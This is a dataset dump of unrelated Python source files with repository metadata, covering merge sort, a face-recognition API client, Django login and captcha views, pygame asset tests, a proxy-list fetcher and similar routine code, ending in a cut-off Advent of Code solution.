PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lrotate_recovery".split(';') if "-lrotate_recovery" != "" else []
PROJECT_NAME = "rotate_recovery"
PROJECT_SPACE_DIR = "/home/alfred/quan_ws/devel"
PROJECT_VERSION = "1.13.0"
|
[
"quanzhou64@gmail.com"
] |
quanzhou64@gmail.com
|
a501a4ab05f3d9e89675e2356cd1b41b8b15c30b
|
a995f917e307be0d427cc9cfd3dbdd045abdd097
|
/算法基础课/1.基础算法/AcWing 787. 归并排序.py
|
e744c5c260576841526218d12f96711f9577710f
|
[] |
no_license
|
Andrewlearning/Leetcoding
|
80d304e201588efa3ac93626021601f893bbf934
|
819fbc523f3b33742333b6b39b72337a24a26f7a
|
refs/heads/master
| 2023-04-02T09:50:30.501811
| 2023-03-18T09:27:24
| 2023-03-18T09:27:24
| 243,919,298
| 1
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,080
|
py
|
def merge_sort(arr, l, r, temp):
if l >= r:
return
# 1.选取中点
mid = (l + r) // 2
# 2.递归排序
merge_sort(arr, l, mid, temp)
merge_sort(arr, mid + 1, r, temp)
# 3.归并操作,原数组的左右两半指针
i = l
j = mid + 1
# temp数组的指针
k = 0
while (i <= mid and j <= r):
if arr[i] <= arr[j]:
temp[k] = arr[i]
i += 1
else:
temp[k] = arr[j]
j += 1
k += 1
while i <= mid:
temp[k] = arr[i]
i += 1
k += 1
while j <= r:
temp[k] = arr[j]
j += 1
k += 1
# temp记录排序好的数组
# 然后更新到原数组上
i, j = l, 0
while i <= r:
arr[i] = temp[j]
i += 1
j += 1
if __name__ == '__main__':
n = int(input())
lst = list(map(int, input().split()))
temp = [0] * n
merge_sort(lst, 0, len(lst) - 1, temp)
print(' '.join(map(str, lst)))
# 链接:https://www.acwing.com/activity/content/code/content/111492/
|
[
"yifu3@ualberta.ca"
] |
yifu3@ualberta.ca
|
972744e8cd7d968799613fd102bb9eb9d912e243
|
33195bfc9e62bb00ce54f050febb6a3a0929a34b
|
/ms_face_api/src/ms_face_api/face.py
|
f4e45a229df977cece372f41acae8dfe64ccfceb
|
[
"MIT"
] |
permissive
|
LCAS/ros_web_apis
|
8f48e08b52433d6d97173cac1debd45a41681110
|
4b42bcc3c970769e8c814525e566ae37b506f415
|
refs/heads/master
| 2021-10-24T20:33:27.444877
| 2019-03-28T15:54:42
| 2019-03-28T15:54:42
| 82,785,629
| 0
| 4
|
MIT
| 2019-03-28T15:54:43
| 2017-02-22T09:25:33
|
Python
|
UTF-8
|
Python
| false
| false
| 6,400
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
File: face.py
Description: Face section of the Cognitive Face API.
"""
from . import util
def detect(image, face_id=True, landmarks=False, attributes=''):
"""Detect human faces in an image and returns face locations, and
optionally with `face_id`s, landmarks, and attributes.
Args:
image: A URL or a file path or a file-like object represents an image.
face_id: Optional parameter. Return `face_id`s of the detected faces or
not. The default value is `True`.
landmarks: Optional parameter. Return face landmarks of the detected
faces or not. The default value is `False`.
attributes: Optional parameter. Analyze and return the one or more
specified face attributes in the comma-separated string like
`age,gender`. Supported face attributes include age, gender,
headPose, smile, facialHair, and glasses. Note that each face
attribute analysis has additional computational and time cost.
Returns:
An array of face entries ranked by face rectangle size in descending
order. An empty response indicates no faces detected. A face entry may
contain the corresponding values depending on input parameters.
"""
url = 'detect'
headers, data, json = util.parse_image(image)
params = {
'returnFaceId': face_id and 'true' or 'false',
'returnFaceLandmarks': landmarks and 'true' or 'false',
'returnFaceAttributes': attributes,
}
return util.request('POST', url, headers=headers, params=params, json=json,
data=data)
def find_similars(face_id, face_list_id=None, face_ids=None,
max_candidates_return=20, mode='matchPerson'):
"""Given query face's `face_id`, to search the similar-looking faces from a
`face_id` array or a `face_list_id`.
Parameter `face_list_id` and `face_ids` should not be provided at the same
time.
Args:
face_id: `face_id` of the query face. User needs to call `face.detect`
first to get a valid `face_id`. Note that this `face_id` is not
persisted and will expire in 24 hours after the detection call.
face_list_id: An existing user-specified unique candidate face list,
created in `face_list.create`. Face list contains a set of
`persisted_face_ids` which are persisted and will never expire.
face_ids: An array of candidate `face_id`s. All of them are created by
`face.detect` and the `face_id`s will expire in 24 hours after the
detection call. The number of `face_id`s is limited to 1000.
max_candidates_return: Optional parameter. The number of top similar
faces returned. The valid range is [1, 1000]. It defaults to 20.
mode: Optional parameter. Similar face searching mode. It can be
"matchPerson" or "matchFace". It defaults to "matchPerson".
Returns:
An array of the most similar faces represented in `face_id` if the
input parameter is `face_ids` or `persisted_face_id` if the input
parameter is `face_list_id`.
"""
url = 'findsimilars'
json = {
'faceId': face_id,
'faceListId': face_list_id,
'faceIds': face_ids,
'maxNumOfCandidatesReturned': max_candidates_return,
'mode': mode,
}
return util.request('POST', url, json=json)
def group(face_ids):
"""Divide candidate faces into groups based on face similarity.
Args:
face_ids: An array of candidate `face_id`s created by `face.detect`.
The maximum is 1000 faces.
Returns:
one or more groups of similar faces (ranked by group size) and a
messyGroup.
"""
url = 'group'
json = {
'faceIds': face_ids,
}
return util.request('POST', url, json=json)
def identify(face_ids, person_group_id, max_candidates_return=1,
threshold=None):
"""Identify unknown faces from a person group.
Args:
face_ids: An array of query `face_id`s, created by the `face.detect`.
Each of the faces are identified independently. The valid number of
`face_ids` is between [1, 10].
person_group_id: `person_group_id` of the target person group, created
by `person_group.create`.
max_candidates_return: Optional parameter. The range of
`max_candidates_return` is between 1 and 5 (default is 1).
threshold: Optional parameter. Confidence threshold of identification,
used to judge whether one face belongs to one person. The range of
confidence threshold is [0, 1] (default specified by algorithm).
Returns:
The identified candidate person(s) for each query face(s).
"""
url = 'identify'
json = {
'personGroupId': person_group_id,
'faceIds': face_ids,
'maxNumOfCandidatesReturned': max_candidates_return,
'confidenceThreshold': threshold,
}
return util.request('POST', url, json=json)
def verify(face_id, another_face_id=None, person_group_id=None,
person_id=None):
"""Verify whether two faces belong to a same person or whether one face
belongs to a person.
For face to face verification, only `face_id` and `another_face_id` is
necessary. For face to person verification, only `face_id`,
`person_group_id` and `person_id` is needed.
Args:
face_id: `face_id` of one face, comes from `face.detect`.
another_face_id: `face_id` of another face, comes from `face.detect`.
person_group_id: Using existing `person_group_id` and `person_id` for
fast loading a specified person. `person_group_id` is created in
`person_group.create`.
person_id: Specify a certain person in a person group. `person_id` is
created in `person.create`.
Returns:
The verification result.
"""
url = 'verify'
json = {}
if another_face_id:
json.update({
'faceId1': face_id,
'faceId2': another_face_id,
})
else:
json.update({
'faceId': face_id,
'personGroupId': person_group_id,
'personId': person_id,
})
return util.request('POST', url, json=json)
|
[
"marc@hanheide.net"
] |
marc@hanheide.net
|
d8d1812873a44c27109fa4743dfcfd87d8b54ca3
|
d2f63dd0bb5bd8fa7e9ae4ca828cbfe710390f33
|
/horizon/horizon/dashboards/nova/images_and_snapshots/snapshots/forms.py
|
aad9e6b93451418dbc9496b6625eebdf3778f553
|
[
"Apache-2.0"
] |
permissive
|
citrix-openstack/horizon
|
4df36bec738a212cbb320b8ac4caf624a883815e
|
7987e68f135895728f891c2377b589f701d8106e
|
HEAD
| 2016-09-11T11:30:42.348228
| 2012-01-24T01:46:06
| 2012-01-24T01:46:06
| 2,492,995
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,224
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django import shortcuts
from django.contrib import messages
from django.utils.translation import ugettext as _
from openstackx.api import exceptions as api_exceptions
from horizon import api
from horizon import forms
LOG = logging.getLogger(__name__)
class CreateSnapshot(forms.SelfHandlingForm):
tenant_id = forms.CharField(widget=forms.HiddenInput())
instance_id = forms.CharField(widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
name = forms.CharField(max_length="20", label=_("Snapshot Name"))
def handle(self, request, data):
try:
LOG.info('Creating snapshot "%s"' % data['name'])
snapshot = api.snapshot_create(request,
data['instance_id'],
data['name'])
instance = api.server_get(request, data['instance_id'])
messages.info(request,
_('Snapshot "%(name)s" created for instance "%(inst)s"') %
{"name": data['name'], "inst": instance.name})
return shortcuts.redirect('horizon:nova:images_and_snapshots:'
'index')
except api_exceptions.ApiException, e:
msg = _('Error Creating Snapshot: %s') % e.message
LOG.exception(msg)
messages.error(request, msg)
return shortcuts.redirect(request.build_absolute_uri())
|
[
"gabriel@strikeawe.com"
] |
gabriel@strikeawe.com
|
1190c16c78aea4a60bd6c95b91fa8737499b53b0
|
95d32a98d0715816fd763c6df356069d91d74f33
|
/021.py
|
83ecc3eddb072db50e4b272f4ea5ba096ba4d2c3
|
[] |
no_license
|
jod35/coding-challenges
|
1f65d08d92c143004f44eafd4922ec0dcb652a1f
|
21cfa2853dac70055d2b20155e03dff1c235ee02
|
refs/heads/master
| 2022-12-14T22:31:37.344450
| 2020-09-18T19:47:51
| 2020-09-18T19:47:51
| 291,939,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
firstname=input("Enter your first name: ")
surname=input("Enter your surname: ")
print(f"{firstname} {surname} is of length {len(firstname+surname)}")
|
[
"jodestrevin@gmail.com"
] |
jodestrevin@gmail.com
|
3ed7586381e1664293709ab9dac14351df1831e7
|
6999630ddf8559c9c6bee40a1dfa4a53d2ce4867
|
/get_proxy_from_XMX.py
|
5b1e4d26017e8ab210b7b69b68e4d87cb4dd843d
|
[] |
no_license
|
possager/YFZX_new
|
a6a21cd7a8d6731af5ce87aae9887408472d295a
|
057925659a7fcae4179d68cf2e0fca576e1de9f2
|
refs/heads/master
| 2021-01-02T22:33:00.488949
| 2017-11-27T00:49:47
| 2017-11-27T00:49:47
| 99,334,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,029
|
py
|
#_*_coding:utf-8_*_
#因为reids在idc上挂了,所以写了这么一个新的代理
import requests
import json
import time
from saveresult import BASIC_FILE
import random
import datetime
class Proxy:
# def __init__(self,url_proxy='http://172.16.2.11:8899'):
def __init__(self,url_proxy='http://172.16.1.4:8899/'):
self.url_proxy=url_proxy
def save_proxy(self):
response=requests.get(self.url_proxy)
jsondata=json.loads(response.text)
file1=BASIC_FILE+'/proxy.txt'
with open(file1,'w') as fl:
json.dump(jsondata,fl,encoding='utf-8')
# json.dump(jsondata,file1)
def get_proxy_couple(self,num):
file1 = BASIC_FILE + '/proxy.txt'
with open(file1,'r') as fl:
datajson=json.load(fl,encoding='utf-8')
if datajson:
# return (str(datajson[num]['ip']),str(datajson[num]['port']))
return str(datajson[num]['ip'])+':'+str(datajson[num]['port'])
# url_proxy='http://192.168.8.52:8899/'
url_proxy='http://172.16.1.4:8899/'#yuancheng
def save_proxy():
while True:
try:
response = requests.get(url_proxy)
jsondata = json.loads(response.text)
file1 = BASIC_FILE + '/proxy.txt'
with open(file1, 'w') as fl:
json.dump(jsondata, fl, encoding='utf-8')
print datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(30)
except Exception as e:
pass
def get_proxy_couple(num):
file1 = BASIC_FILE + '/proxy.txt'
with open(file1,'r') as fl:
datajson=json.load(fl,encoding='utf-8')
if datajson:
# return (str(datajson[num]['ip']),str(datajson[num]['port']))
num=random.randint(0,len(datajson)-1)
return str(datajson[num]['ip'])+':'+str(datajson[num]['port'])
if __name__ == '__main__':
# thisclass=Proxy()
# # thisclass.save_proxy()
# print thisclass.get_proxy_couple(2)
# print get_proxy_couple(2)
save_proxy()
|
[
"passager@163.com"
] |
passager@163.com
|
9f653ab13307676c72916817ec6736cef0226239
|
d41d18d3ea6edd2ec478b500386375a8693f1392
|
/plotly/validators/carpet/aaxis/_tickvals.py
|
d662833232a93d94748922377e31518cbba4b730
|
[
"MIT"
] |
permissive
|
miladrux/plotly.py
|
38921dd6618650d03be9891d6078e771ffccc99a
|
dbb79e43e2cc6c5762251537d24bad1dab930fff
|
refs/heads/master
| 2020-03-27T01:46:57.497871
| 2018-08-20T22:37:38
| 2018-08-20T22:37:38
| 145,742,203
| 1
| 0
|
MIT
| 2018-08-22T17:37:07
| 2018-08-22T17:37:07
| null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
import _plotly_utils.basevalidators
class TickvalsValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(
self, plotly_name='tickvals', parent_name='carpet.aaxis', **kwargs
):
super(TickvalsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='data',
**kwargs
)
|
[
"adam.kulidjian@gmail.com"
] |
adam.kulidjian@gmail.com
|
654f906f59ef8bb22afe907524e10160829658d8
|
1f006f0c7871fcde10986c4f5cec916f545afc9f
|
/apps/ice/plugins/required/plugin_info.py
|
efab21549b3cbef46e32e6e38adbc4c8701eb49f
|
[] |
no_license
|
ptsefton/integrated-content-environment
|
248b8cd29b29e8989ec1a154dd373814742a38c1
|
c1d6b5a1bea3df4dde10cb582fb0da361dd747bc
|
refs/heads/master
| 2021-01-10T04:46:09.319989
| 2011-05-05T01:42:52
| 2011-05-05T01:42:52
| 36,273,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,006
|
py
|
#
# Copyright (C) 2007 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import pysvn
import sys
pluginName = "ice.info"
pluginDesc = ""
pluginFunc = None # either (or both) pluginFunc or pluginClass should
pluginClass = None # be set by the pluginInit() method
pluginInitialized = False # set to True by pluginInit() method
def pluginInit(iceContext, **kwargs):
global pluginFunc, pluginClass, pluginInitialized
pluginFunc = None
pluginClass = VersionInfo
pluginInitialized = True
return pluginFunc
class VersionInfo:
def __init__(self, iceContext=None, *args):
self.iceContext = iceContext
def svn(self):
return str(pysvn.svn_version)
def pysvn(self):
return str(pysvn.version)
def python(self):
return str(os.sys.version)
def iceTrunkRevision(self):
svn = pysvn.Client()
return str(svn.info('../../../trunk').revision)
def __getArgs(self):
return self.__args
def summary(self):
info = VersionInfo()
summary = "Built from ICE trunk " + info.iceTrunkRevision() + "\n"
summary = summary + "SVN version " + info.svn() + "\n"
summary = summary + "pysvn version " + info.pysvn() + "\n"
summary = summary + "Python: " + info.python()
return summary
def getSummary(self):
argv = sys.argv
info = VersionInfo()
try:
result = "ICE version: " + argv[1] + "\n"
result = result + info.summary()
return str(result)
except:
try:
f = open('version_info.txt', 'r')
info = f.read()
f.close()
return info
except IOError:
summary = "ICE version: unversioned \n"
summary = summary + "SVN version " + info.svn() + "\n"
summary = summary + "pysvn version " + info.pysvn() + "\n"
summary = summary + "Python: " + info.python()
return summary
def main(argv=None):
if argv is None:
argv = sys.argv
info = VersionInfo()
print "%s" % info.getSummary()
if __name__ == "__main__":
sys.exit(main())
|
[
"raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] |
raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05
|
20a5389145ea522daccca65f7fb7d8b787f1b09e
|
978248bf0f275ae688f194593aa32c267832b2b6
|
/xlsxwriter/test/comparison/test_set_start_page01.py
|
11f627dcef39de7dc1ca840d9031d251ff300970
|
[
"BSD-2-Clause-Views"
] |
permissive
|
satish1337/XlsxWriter
|
b0c216b91be1b74d6cac017a152023aa1d581de2
|
0ab9bdded4f750246c41a439f6a6cecaf9179030
|
refs/heads/master
| 2021-01-22T02:35:13.158752
| 2015-03-31T20:32:28
| 2015-03-31T20:32:28
| 33,300,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'set_start_page01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {'xl/worksheets/sheet1.xml': ['<pageMargins']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with printer settings."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.set_start_page(1)
worksheet.set_paper(9)
worksheet.vertical_dpi = 200
worksheet.write('A1', 'Foo')
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
034ebb7456f82467d4f6eac71983f9f9b364a2db
|
306045a1cd0fb362f46d4db88311f442311bbc16
|
/examples/idioms/programs/002.0011-print-hello-10-times.py
|
3793da0117c8784ebd602f2ed2ba9a02168556cd
|
[
"MIT"
] |
permissive
|
laowantong/paroxython
|
608c9010a2b57c8f7ed5ea309e24035c2b2e44a3
|
a6d45829dd34f046d20e5bae780fbf7af59429cb
|
refs/heads/master
| 2023-09-01T05:18:29.687916
| 2022-11-07T17:40:31
| 2022-11-07T17:40:31
| 220,820,424
| 36
| 5
|
MIT
| 2023-09-08T04:44:58
| 2019-11-10T16:54:56
|
Python
|
UTF-8
|
Python
| false
| false
| 307
|
py
|
"""Print Hello 10 times.
Loop to execute some code a constant number of times
Source: programming-idioms.org
"""
# Implementation author:
# Created on 2015-11-30T12:37:23.746597Z
# Last modified on 2019-09-27T02:17:54.987284Z
# Version 2
# Indention is mandatory
for i in range(10):
print("Hello")
|
[
"laowantong@users.noreply.github.com"
] |
laowantong@users.noreply.github.com
|
8dfe4354130dd664527f1ddd3ce0a81ac5a51536
|
3c9103046db53185cfedc1598933a790718e4d57
|
/pygame_assets/tests/test_loaders.py
|
e8d9dde92a8a2bda26361859538fcfebf686ce40
|
[
"MIT"
] |
permissive
|
florimondmanca/pygame-assets
|
9aabe7e482e72c37a95f9283f6b67e47acadf941
|
1ad7870800866d2b1b287d8063bd10edd99fd521
|
refs/heads/master
| 2021-08-19T12:46:04.149161
| 2017-11-25T12:14:06
| 2017-11-25T12:14:06
| 110,216,972
| 3
| 0
| null | 2017-11-11T12:28:38
| 2017-11-10T07:31:56
|
Python
|
UTF-8
|
Python
| false
| false
| 5,844
|
py
|
"""Tests for the loaders API."""
import unittest
import pygame
from pygame_assets.loaders import image as load_image
from pygame_assets.loaders import image_with_rect as load_image_with_rect
from pygame_assets.loaders import sound as load_sound
from pygame_assets.loaders import music as load_music
from pygame_assets.loaders import font as load_font
from pygame_assets.loaders import freetype as load_freetype
from pygame_assets.configure import get_config
from .utils import TestCase, change_config
class LoaderTestCase(TestCase):
"""Test case suited for loader unit testing.
Class attributes
----------------
loader : function
A loader as defined by pygame_assets.
filename : str
If defined, the .asset() shortcut will be available to get the
corresponding asset.
"""
filename = None
loader = None
@classmethod
def asset(cls, *args, **kwargs):
if cls.filename is None:
raise ValueError('Could not get asset: no filename defined.')
return cls.loader(cls.filename, *args, **kwargs)
class TestImageLoader(LoaderTestCase):
"""Unit tests for the image loader."""
loader = load_image
filename = 'test-image.png'
@classmethod
def setUpClass(cls):
pygame.init()
# pygame requires to set_mode before loading images
# the same constraint applies to pygame_assets
cls.screen = pygame.display.set_mode((800, 600))
def test_load_image_from_path(self):
self.assertIsInstance(self.asset(), pygame.Surface)
def test_image_with_alpha_keeps_alpha(self):
image = load_image('test-image-with-alpha.png')
self.assertIsNotNone(image.get_alpha())
def test_image_without_alpha_has_no_alpha(self):
image = load_image('test-image-without-alpha.jpg')
self.assertIsNone(image.get_alpha())
def test_force_convert_alpha(self):
self.asset(convert_alpha=True)
self.asset(convert_alpha=False)
def test_alpha_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(True)
class TestImageWithRectLoader(LoaderTestCase):
"""Unit tests for the image_with_rect loader."""
loader = load_image_with_rect
filename = 'test-image.png'
@classmethod
def setUpClass(cls):
pygame.init()
# pygame requires to set_mode before loading images
# the same constraint applies to pygame_assets
cls.screen = pygame.display.set_mode((800, 600))
def test_load_image_with_rect(self):
image, rect = self.asset()
self.assertIsInstance(image, pygame.Surface)
self.assertIsInstance(rect, pygame.Rect)
class TestSoundLoader(LoaderTestCase):
"""Unit tests for the sound loader."""
loader = load_sound
filename = 'test-sound.wav'
@classmethod
def setUpClass(cls):
pygame.mixer.init()
def test_load_sound_from_path(self):
self.assertIsInstance(self.asset(), pygame.mixer.Sound)
def test_set_volume_when_loading(self):
sound = self.asset(volume=0.5)
self.assertEqual(sound.get_volume(), 0.5)
def test_volume_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(0.5)
class TestMusicLoader(LoaderTestCase):
"""Unit tests for the music loader."""
loader = load_music
filename = 'test-sound.wav'
@classmethod
def setUpClass(cls):
pygame.mixer.init()
def test_dir_is_sound(self):
self.assertListEqual(get_config().dirs['music'], ['sound'])
def test_load_music_from_path(self):
self.assertFalse(pygame.mixer.music.get_busy())
returned_value = self.asset()
self.assertIsNone(returned_value)
# music did not start playing
self.assertFalse(pygame.mixer.music.get_busy())
def test_set_volume_when_loading(self):
self.asset(volume=0.5)
self.assertEqual(pygame.mixer.music.get_volume(), 0.5)
def test_volume_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(0.5)
class TestFontLoader(LoaderTestCase):
"""Unit tests for the font loader."""
filename = 'bebas-neue.otf'
loader = load_font
@classmethod
def setUpClass(cls):
pygame.font.init()
def test_load_font_from_path(self):
self.assertIsInstance(self.asset(), pygame.font.Font)
def test_load_with_size(self):
self.assertAlmostEqual(self.asset(size=40).get_height(), 40, delta=10)
def test_default_size_is_20(self):
self.assertEqual(get_config().default_font_size, 20)
self.assertAlmostEqual(self.asset().get_height(), 20, delta=10)
def test_default_change_default_size(self):
with change_config('default_font_size') as config:
config.default_font_size = 60
self.assertAlmostEqual(self.asset().get_height(), 60, delta=15)
class TestFreetypeFontLoader(LoaderTestCase):
"""Unit tests for the freetype font loader."""
filename = 'bebas-neue.otf'
loader = load_freetype
@classmethod
def setUpClass(cls):
pygame.font.init()
def test_dir_is_font(self):
self.assertListEqual(get_config().dirs['freetype'], ['font'])
def test_load_font_from_path(self):
self.assertIsInstance(self.asset(), pygame.freetype.Font)
def test_load_with_size(self):
self.assertEqual(self.asset(size=40).size, 40)
def test_default_size_is_20(self):
self.assertEqual(get_config().default_font_size, 20)
self.assertEqual(self.asset().size, 20)
def test_change_default_size(self):
with change_config('default_font_size') as config:
config.default_font_size = 60
self.assertEqual(self.asset().size, 60)
if __name__ == '__main__':
unittest.main()
|
[
"florimond.manca@gmail.com"
] |
florimond.manca@gmail.com
|
18c381de7282cb9e143b3c630f47752bc1dca908
|
894b8a99a3e05dda63ff156d9a2f3ce81f25c3ba
|
/imix/data/reader/textvqa_reader.py
|
984acecbce85bfcc240b0181dd9e58d455efa3cc
|
[
"Apache-2.0"
] |
permissive
|
jjInsper/iMIX
|
e5e46c580e2925fb94a2571c25777ce504ffab14
|
99898de97ef8b45462ca1d6bf2542e423a73d769
|
refs/heads/master
| 2023-08-08T01:24:47.161948
| 2021-09-16T09:35:35
| 2021-09-16T09:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,379
|
py
|
from ..utils.stream import ItemFeature
from .base_reader import IMIXDataReader
from imix.utils.common_function import update_d1_with_d2
class TextVQAReader(IMIXDataReader):
def __init__(self, cfg):
super().__init__(cfg)
# assert self.default_feature, ('Not support non-default features now.')
def __len__(self):
return len(self.mix_annotations)
def __getitem__(self, idx):
annotation = self.mix_annotations[idx]
feature = self.feature_obj[idx]
global_feature, ocr_feature = {}, {}
item_feature = ItemFeature(annotation)
item_feature.error = False
item_feature.tokens = annotation['question_tokens']
item_feature.img_id = annotation['image_id']
update_d1_with_d2(d1=item_feature, d2=feature)
if self.global_feature_obj:
global_feature = self.global_feature_obj[idx]
global_feature.update({'features_global': global_feature.pop('features')})
update_d1_with_d2(d1=item_feature, d2=global_feature)
if self.ocr_feature_obj:
ocr_feature = self.ocr_feature_obj[idx]
ocr_feature.update({'features_ocr': ocr_feature.pop('features')})
update_d1_with_d2(d1=item_feature, d2=ocr_feature)
item_feature.error = None in [feature, global_feature, ocr_feature]
return item_feature
|
[
"hsslab.inspur@gmail.com"
] |
hsslab.inspur@gmail.com
|
08d782838db68810147ca27d62dcd4ca28c26ec9
|
e81d274d6a1bcabbe7771612edd43b42c0d48197
|
/Django/day76(中间件)/demo/webapp/user/views.py
|
45a2bf2c3f84afbb53964e886aeb9bd72f7aabe7
|
[
"MIT"
] |
permissive
|
ChWeiking/PythonTutorial
|
1259dc04c843382f2323d69f6678b9431d0b56fd
|
1aa4b81cf26fba2fa2570dd8e1228fef4fd6ee61
|
refs/heads/master
| 2020-05-15T00:50:10.583105
| 2016-07-30T16:03:45
| 2016-07-30T16:03:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,800
|
py
|
from django.shortcuts import render,redirect
from user.models import *
from hashlib import *
from django.http import *
from django.template import loader,RequestContext
from django.core.urlresolvers import reverse
from datetime import timedelta
from django.views.decorators.csrf import csrf_exempt
from PIL import Image, ImageDraw, ImageFont, ImageFilter
from io import StringIO,BytesIO
import random
# Create your views here.
def register(request):
return render(request, 'user/register.html')
def register_handler(request):
user = User()
user.uname = request.POST.get('username')
user.upwd = sha1(request.POST.get('userpwd').encode('utf-8')).hexdigest()
user.save()
return render(request, 'user/success.html')
def login(request):
print('session:%s'%request.session.get('currentUser'))
context = {}
#获取cookie
username = request.COOKIES.get('mycooki')
if username:
context['username']=username
return render(request, 'user/login.html',context)
#@csrf_exempt
def login_handler(request):
# 定义上下文
context = {}
#获取验证码
userverification = request.POST.get('userverification')
if userverification==None or request.session['codes'].upper() != userverification.upper():
context = {'userverification_error':'验证码输入错误'}
return render(request,'user/login.html',context)
#用户名密码
username = request.POST.get('username')
userpwd = sha1(request.POST.get('userpwd').encode('utf-8')).hexdigest()
#匹配
ret = User.objects.filter(uname=username,upwd=userpwd)
if len(ret)==0:
return HttpResponseRedirect('/user/login')
else:
#在服务端保持一个session键值对
request.session['currentUser'] = username
request.session.set_expiry(36000)
#request.session.set_expiry(timedelta(days=2))
#加载模板
t1 = loader.get_template('user/success.html')
#上下文
requestcontext = RequestContext(request,context)
#创建具有模板和上下文的reponse
response = HttpResponse(t1.render(requestcontext))
#记录用户名密码的变量
rememberName = request.POST.get('rememberName')
#判断
if rememberName=='1':
#写cookie
response.set_cookie('mycookie',username,max_age=3600)
return response
def verification(request):
# 240 x 60:
width = 60 * 4
height = 60
image = Image.new('RGB', (width, height), (255, 255, 255))
    # create the Font object:
    font = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-BoldItalic.ttf', 36)
    # create the Draw object:
    draw = ImageDraw.Draw(image)
    # fill every pixel:
    for x in range(width):
        for y in range(height):
            draw.point((x, y), fill=rndColor())
    # accumulate the captcha string
    codes = ''
    # draw the text:
    for t in range(4):
        code = rndChar()
        codes += code
        draw.text((60 * t + 10, 10), code, font=font, fill=rndColor2())
    # blur:
    image = image.filter(ImageFilter.BLUR)
    # store the captcha string in the session
    request.session['codes'] = codes
    request.session.set_expiry(0)
    # in-memory byte buffer
f = BytesIO()
image.save(f,'jpeg')
return HttpResponse(f.getvalue(),'image/jpeg')
def test1(request):
    # simulate an exception
num = 1/0
return render(request, 'user/test1.html')
# random letter:
def rndChar():
return chr(random.randint(65, 90))
# random color 1:
def rndColor():
return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))
# random color 2:
def rndColor2():
return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))
|
[
"1025212779@qq.com"
] |
1025212779@qq.com
|
afb62f95eaaa4ce1aada8b5967d560921f144a77
|
6d2e4655ce0a9012aea88c83e2f49572e6d06738
|
/day-04/day-04-passport-processing-01.py
|
e90db8ced1bc732920d3e2c46bd83a708a9de7e0
|
[] |
no_license
|
LilySu/Advent_of_Code_2020
|
d7664b2e4469e5b0434db94d2452cdf62bc05daa
|
521da7b20b3e47d49a6180e2a2aad78b4d923efa
|
refs/heads/main
| 2023-02-05T00:51:56.363196
| 2020-12-26T03:43:30
| 2020-12-26T03:43:30
| 321,393,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
import re
from typing import List
from run_for_all_input_and_timer import Manager, timer
setup = Manager()
input = setup.get_file()
@timer
def solve(input: List[str]) -> int:
counter = 0
passports = []
txt_block = []
req = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']
reqc = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid', 'cid']
for line in input:
if line != '':
if ' ' in line:
line = line.split(' ')
for i in line:
txt_block.append(i)
else:
txt_block.append(line)
else:
passports.append(txt_block)
txt_block = []
for idx, txt_block in enumerate(passports):
